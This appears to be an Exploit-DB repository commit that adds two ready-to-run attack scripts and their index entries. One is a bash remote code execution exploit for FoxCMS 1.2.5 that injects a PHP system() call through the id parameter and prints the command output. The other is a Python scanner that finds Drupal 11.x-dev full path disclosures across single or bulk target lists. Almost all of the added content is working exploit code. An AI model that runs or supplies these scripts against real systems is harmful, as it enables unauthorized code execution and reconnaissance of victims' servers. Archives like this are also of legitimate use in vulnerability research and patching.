DB: 2025-04-20
3 changes to exploits/shellcodes/ghdb FoxCMS 1.2.5 - Remote Code Execution (RCE) Drupal 11.x-dev - Full Path Disclosure
This commit is contained in:
parent
8ce497b2c8
commit
71bfc9b6c5
3 changed files with 164 additions and 0 deletions
63
exploits/multiple/webapps/52267.bash
Normal file
63
exploits/multiple/webapps/52267.bash
Normal file
|
@ -0,0 +1,63 @@
|
|||
# Date: 2025-04-17
|
||||
# Exploit Title:
|
||||
# Exploit Author: VeryLazyTech
|
||||
# Vendor Homepage: https://www.foxcms.org/
|
||||
# Software Link: https://www.foxcms.cn/
|
||||
# Version: FoxCMS v.1.2.5
|
||||
# Tested on: Ubuntu 22.04, Windows Server 2019
|
||||
# CVE: CVE-2025-29306
|
||||
# Website: https://www.verylazytech.com
|
||||
|
||||
#!/bin/bash
|
||||
|
||||
banner() {
|
||||
cat <<'EOF'
|
||||
______ _______ ____ ___ ____ ____ ____ ___ _____ ___ __
|
||||
/ ___\ \ / / ____| |___ \ / _ \___ \| ___| |___ \ / _ \___ / / _ \ / /_
|
||||
| | \ \ / /| _| __) | | | |__) |___ \ __) | (_) ||_ \| | | | '_ \
|
||||
| |___ \ V / | |___ / __/| |_| / __/ ___) | / __/ \__, |__) | |_| | (_) |
|
||||
\____| \_/ |_____| |_____|\___/_____|____/ |_____| /_/____/ \___/ \___/
|
||||
|
||||
__ __ _ _____ _
|
||||
\ \ / /__ _ __ _ _ | | __ _ _____ _ |_ _|__ ___| |__
|
||||
\ \ / / _ \ '__| | | | | | / _` |_ / | | | | |/ _ \/ __| '_ \
|
||||
\ V / __/ | | |_| | | |__| (_| |/ /| |_| | | | __/ (__| | | |
|
||||
\_/ \___|_| \__, | |_____\__,_/___|\__, | |_|\___|\___|_| |_|
|
||||
|___/ |___/
|
||||
|
||||
|
||||
@VeryLazyTech - Medium
|
||||
|
||||
EOF
|
||||
|
||||
}
|
||||
|
||||
# Call the banner function
|
||||
banner
|
||||
|
||||
set -e
|
||||
|
||||
# Check for correct number of arguments
|
||||
if [ "$#" -ne 2 ]; then
|
||||
printf "Usage: $0 <url> <command>"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
TARGET=$1
|
||||
|
||||
# Encode payload
|
||||
ENCODED_CMD=$(python3 -c "import urllib.parse; print(urllib.parse.quote('\${@print_r(@system(\"$2\"))}'))")
|
||||
FULL_URL="${TARGET}?id=${ENCODED_CMD}"
|
||||
|
||||
echo "[*] Sending RCE payload: $2"
|
||||
HTML=$(curl -s "$FULL_URL")
|
||||
|
||||
# Extract <ul> from known XPath location using xmllint
|
||||
UL_CONTENT=$(echo "$HTML" | xmllint --html --xpath "/html/body/header/div[1]/div[2]/div[1]/ul" - 2>/dev/null)
|
||||
|
||||
# Strip tags, clean up
|
||||
CLEANED=$(echo "$UL_CONTENT" | sed 's/<[^>]*>//g' | sed '/^$/d' | sed 's/^[[:space:]]*//')
|
||||
|
||||
echo
|
||||
echo "[+] Command Output:"
|
||||
echo "$CLEANED"
|
99
exploits/php/webapps/52266.py
Executable file
99
exploits/php/webapps/52266.py
Executable file
|
@ -0,0 +1,99 @@
|
|||
#!/usr/bin/env python
|
||||
# Exploit Title: Drupal 11.x-dev - Full Path Disclosure
|
||||
# Date: 2025-04-16
|
||||
# Exploit Author: Milad Karimi (Ex3ptionaL)
|
||||
# Contact: miladgrayhat@gmail.com # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
|
||||
# MiRROR-H: https://mirror-h.org/search/hacker/49626/
|
||||
# Version: 11.x-dev
|
||||
# CVE: CVE-2024-45440
|
||||
|
||||
# -*- coding:UTF-8 -*-
|
||||
import re
|
||||
import requests
|
||||
def banners():
|
||||
cve_id = "CVE-2024-45440"
|
||||
description = "Drupal 11.x-dev Full Path Disclosure Vulnerability: " \
|
||||
"core/authorize.php allows Full Path Disclosure (even
|
||||
when error logging is None) " \
|
||||
"if the value of hash_salt is file_get_contents of a file
|
||||
that does not exist."
|
||||
disclaimer = "This tool is for educational purposes only. Any misuse of
|
||||
this information is the responsibility of " \
|
||||
"the person utilizing this tool. The author assumes no
|
||||
responsibility or liability for any misuse or " \
|
||||
"damage caused by this program."
|
||||
width = 100
|
||||
banner_top_bottom = "=" * width
|
||||
banner_middle = f"{cve_id:^{width}}\n\n{description:^{width}}"
|
||||
banner =
|
||||
f"{banner_top_bottom}\n\n{banner_middle}\n\n{disclaimer}\n\n{banner_top_bottom}"
|
||||
|
||||
return banner
|
||||
def scan_single_url(url=None):
|
||||
if url is None:
|
||||
print("[+] Input the IP/Domain Example: 127.0.0.1 or 127.0.0.1:8080")
|
||||
|
||||
url = input("[+] IP/Domain: ")
|
||||
if not url.startswith('https://') and not url.startswith('http://'):
|
||||
full_url = 'http://' + url + '/core/authorize.php'
|
||||
print("[*] Scanning...")
|
||||
try:
|
||||
headers = {
|
||||
"Host": url,
|
||||
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64;
|
||||
rv:133.0) Gecko/20100101 Firefox/133.0",
|
||||
"Accept":
|
||||
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
|
||||
"Accept-Language":
|
||||
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"
|
||||
}
|
||||
response = requests.get(full_url, headers,timeout=10)
|
||||
pattern = r'<em class="placeholder">(/.*?settings\.php)'
|
||||
matches = re.findall(pattern, response.text)
|
||||
# print(response.text)
|
||||
if 'settings.php' in response.text:
|
||||
print(f"[+] {url} Existed!")
|
||||
for match in matches:
|
||||
print("[+] The full path is:", match)
|
||||
return True
|
||||
else:
|
||||
print(f"[-] {url} Not Exist!")
|
||||
return False
|
||||
except TimeoutError:
|
||||
print(f"[-] {url} Timeout!")
|
||||
except Exception as e:
|
||||
print(f"[-] {url} Failed!")
|
||||
return False
|
||||
def scan_multiple_urls():
|
||||
print("[+] Input the path of txt Example: ./url.txt or
|
||||
C:\\the\\path\\to\\url.txt")
|
||||
url_path = input("[+] Path: ")
|
||||
url_list = []
|
||||
result_list = []
|
||||
try:
|
||||
with open(url_path, 'r', encoding='utf-8') as f:
|
||||
lines = f.readlines()
|
||||
for line in lines:
|
||||
url_list.append(line.strip())
|
||||
except FileNotFoundError as e:
|
||||
print("[-] File Not Found!")
|
||||
for url in url_list:
|
||||
result = scan_single_url(url)
|
||||
if result:
|
||||
result_list.append(url)
|
||||
print("[+] Successful Target:")
|
||||
for result in result_list:
|
||||
print(f"[+] {result}")
|
||||
def main():
|
||||
print(banners())
|
||||
print("[1] Scan single url\n[2] Scan multiple urls")
|
||||
choice = input("[+] Choose: ")
|
||||
if choice == '1':
|
||||
scan_single_url()
|
||||
elif choice == '2':
|
||||
scan_multiple_urls()
|
||||
else:
|
||||
print("[-] Invalid option selected!")
|
||||
pass
|
||||
if __name__ == '__main__':
|
||||
main()
|
|
@ -11963,6 +11963,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
49600,exploits/multiple/webapps/49600.rb,"FortiLogger 4.4.2.2 - Unauthenticated Arbitrary File Upload (Metasploit)",2021-03-01,"Berkan Er",webapps,multiple,,2021-03-01,2021-03-01,1,CVE-2021-3378,,,,,
|
||||
50759,exploits/multiple/webapps/50759.txt,"Fortinet Fortimail 7.0.1 - Reflected Cross-Site Scripting (XSS)",2022-02-18,"Braiant Giraldo Villa",webapps,multiple,,2022-02-18,2022-02-18,0,CVE-2021-43062,,,,,
|
||||
51092,exploits/multiple/webapps/51092.sh,"FortiOS_ FortiProxy_ FortiSwitchManager v7.2.1 - Authentication Bypass",2023-03-27,"Felipe Alcantara",webapps,multiple,,2023-03-27,2023-03-27,0,CVE-2022-40684,,,,,
|
||||
52267,exploits/multiple/webapps/52267.bash,"FoxCMS 1.2.5 - Remote Code Execution (RCE)",2025-04-19,VeryLazyTech,webapps,multiple,,2025-04-19,2025-04-19,0,CVE-2025-29306,,,,,
|
||||
11186,exploits/multiple/webapps/11186.txt,"FreePBX 2.5.1 - SQL Injection",2010-01-18,"Ivan Huertas",webapps,multiple,,2010-01-17,,1,OSVDB-61919,,CYBSEC-Advisory2010-0103-FreePBX_2_5_1_SQL_Injection.pdf,,,
|
||||
11187,exploits/multiple/webapps/11187.txt,"FreePBX 2.5.x - Information Disclosure",2010-01-18,"Ivan Huertas",webapps,multiple,,2010-01-17,,1,OSVDB-61918,,CYBSEC-Advisory2010-0101-FreePBX_2_5_x_Information_disclosure.pdf,,,
|
||||
11184,exploits/multiple/webapps/11184.txt,"FreePBX 2.5.x < 2.6.0 - Persistent Cross-Site Scripting",2010-01-18,"Ivan Huertas",webapps,multiple,,2010-01-17,,1,OSVDB-61920,,CYBSEC-Advisory2010-0102-FreePBX_2_5_x-2_6_Permanent_XSS.pdf,,,
|
||||
|
@ -17546,6 +17547,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
9635,exploits/php/webapps/9635.txt,"Drunken:Golem Gaming Portal - 'admin_news_bot.php' Remote File Inclusion",2009-09-10,"EA Ngel",webapps,php,,2009-09-09,,1,OSVDB-61856;CVE-2009-4622,,,,,
|
||||
3207,exploits/php/webapps/3207.pl,"Drunken:Golem Portal 0.5.1 Alpha 2 - Remote File Inclusion",2007-01-27,MackRulZ,webapps,php,,2007-01-26,2016-09-27,1,OSVDB-36619;CVE-2007-0572,,,,http://www.exploit-db.comdrunkengolem_alpha2.zip,
|
||||
51723,exploits/php/webapps/51723.txt,"Drupal 10.1.2 - web-cache-poisoning-External-service-interaction",2023-09-08,nu11secur1ty,webapps,php,,2023-09-08,2023-09-08,0,,,,,,
|
||||
52266,exploits/php/webapps/52266.py,"Drupal 11.x-dev - Full Path Disclosure",2025-04-19,"Milad karimi",webapps,php,,2025-04-19,2025-04-19,0,CVE-2024-45440,,,,,
|
||||
21863,exploits/php/webapps/21863.txt,"Drupal 4.0 - News Message HTML Injection",2002-09-25,das@hush.com,webapps,php,,2002-09-25,2012-10-09,1,CVE-2002-1806;OSVDB-59300,,,,,https://www.securityfocus.com/bid/5801/info
|
||||
22940,exploits/php/webapps/22940.txt,"Drupal 4.1/4.2 - Cross-Site Scripting",2003-07-21,"Ferruh Mavituna",webapps,php,,2003-07-21,2012-11-27,1,,,,,,https://www.securityfocus.com/bid/8235/info
|
||||
1088,exploits/php/webapps/1088.pl,"Drupal 4.5.3 < 4.6.1 - Comments PHP Injection",2005-07-05,dab,webapps,php,,2005-07-04,2016-05-25,1,OSVDB-17647;CVE-2005-2106,,,,http://www.exploit-db.comdrupal-4.5.3.zip,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue